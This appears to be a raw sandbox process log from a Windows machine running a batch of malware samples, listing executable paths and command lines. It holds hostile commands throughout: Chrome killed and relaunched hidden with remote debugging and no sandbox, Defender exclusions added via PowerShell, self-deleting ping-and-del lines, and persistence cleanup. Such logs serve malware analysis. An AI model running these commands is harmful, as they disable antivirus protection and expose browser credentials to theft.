"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,10629069511157839143,1775154975144621365,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3920 /prefetch:1
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe
"C:\Users\Admin\Desktop\New Text Document mod.exse\a\Setup.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\2568621829.exe
C:\Users\Admin\AppData\Local\Temp\2568621829.exe
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
C:\Windows\system32\schtasks.exe
schtasks /delete /f /tn "Windows Upgrade Manager"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\1487223240.exe
C:\Users\Admin\AppData\Local\Temp\1487223240.exe
C:\Users\Admin\AppData\Local\Temp\3020718451.exe
C:\Users\Admin\AppData\Local\Temp\3020718451.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\Files\frap.exe
"C:\Users\Admin\Desktop\Files\frap.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 10332 -ip 10332
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 10332 -s 768
C:\Users\Admin\Desktop\Files\newfile.exe
"C:\Users\Admin\Desktop\Files\newfile.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\202579613.exe
C:\Users\Admin\AppData\Local\Temp\202579613.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe
"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 7640 -ip 7640
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7640 -s 1292
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\4i790k.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x114,0x118,0x11c,0xf0,0x120,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\torque.exe
"C:\Users\Admin\Desktop\Files\torque.exe"
C:\Users\Admin\Desktop\Files\14082024.exe
"C:\Users\Admin\Desktop\Files\14082024.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\stealc_valenciga.exe
"C:\Users\Admin\Desktop\Files\stealc_valenciga.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 7968 -ip 7968
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 1300
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 12680 -s 1372
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x128,0x12c,0x130,0xf4,0x134,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\injector.exe
"C:\Users\Admin\Desktop\Files\injector.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
\??\c:\users\admin\desktop\files\injector.exe
c:\users\admin\desktop\files\injector.exe
C:\Windows\Resources\Themes\icsys.icn.exe
C:\Windows\Resources\Themes\icsys.icn.exe
\??\c:\windows\resources\themes\explorer.exe
c:\windows\resources\themes\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe SE
\??\c:\windows\resources\svchost.exe
c:\windows\resources\svchost.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
\??\c:\windows\resources\spoolsv.exe
c:\windows\resources\spoolsv.exe PR
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\MicrosoftProfile.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Users\Admin\AppData\Roaming\boleto.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 192 -p 4936 -ip 4936
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4936 -s 1292
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\ldqj18tn.exe
"C:\Users\Admin\Desktop\Files\ldqj18tn.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c copy Descending Descending.bat & Descending.bat
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\ProgramData\gnabpgw\wohcj.exe
"C:\ProgramData\gnabpgw\wohcj.exe"
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Users\Admin\Desktop\Files\china.exe
"C:\Users\Admin\Desktop\Files\china.exe"
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\Desktop\Files\ew.exe
"C:\Users\Admin\Desktop\Files\ew.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\explorer.exe
explorer.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\Windows\explorer.exe
explorer.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe
C:\Users\Admin\Desktop\Files\h5a71wdy.exe
"C:\Users\Admin\Desktop\Files\h5a71wdy.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 5292 -ip 5292
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 1296
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --load-extension=
C:\Program Files\Google\Chrome\Application\original.exe
"C:\Program Files\Google\Chrome\Application\original.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffcb732cc40,0x7ffcb732cc4c,0x7ffcb732cc58
C:\ProgramData\gnabpgw\wohcj.exe
C:\ProgramData\gnabpgw\wohcj.exe
C:\Windows\SYSTEM32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
